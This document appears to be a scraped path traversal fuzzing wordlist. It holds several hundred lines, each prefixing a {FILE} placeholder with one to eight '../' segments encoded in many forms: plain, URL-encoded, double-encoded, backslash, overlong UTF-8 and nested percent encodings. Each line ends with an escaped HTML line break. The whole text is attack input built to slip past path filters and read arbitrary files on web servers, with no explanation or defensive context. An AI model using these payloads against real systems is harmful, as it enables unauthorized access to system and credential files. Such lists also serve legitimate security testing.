%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
